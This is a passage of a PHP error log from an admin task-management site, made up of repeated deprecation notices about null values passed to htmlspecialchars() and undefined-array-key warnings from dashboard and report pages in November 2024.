deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:21:40 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Nov-2024 11:51:50 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Nov-2024 14:09:37 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Nov-2024 14:09:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Nov-2024 14:11:25 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Nov-2024 20:45:31 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Nov-2024 20:45:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [08-Nov-2024 20:45:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [16-Nov-2024 12:34:18 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Nov-2024 12:37:09 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 10:56:15 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 10:56:19 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 11:08:30 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 11:11:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 11:11:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 11:20:37 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 11:21:19 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 11:26:57 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 11:42:38 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 11:42:47 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [26-Nov-2024 11:42:47 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [26-Nov-2024 11:42:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [26-Nov-2024 11:42:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [26-Nov-2024 11:50:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 14:37:17 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 14:37:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [26-Nov-2024 14:37:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [26-Nov-2024 14:38:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [26-Nov-2024 14:38:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [26-Nov-2024 14:41:02 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 14:41:43 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 14:42:02 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 14:48:14 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Nov-2024 22:27:21 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Nov-2024 22:27:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 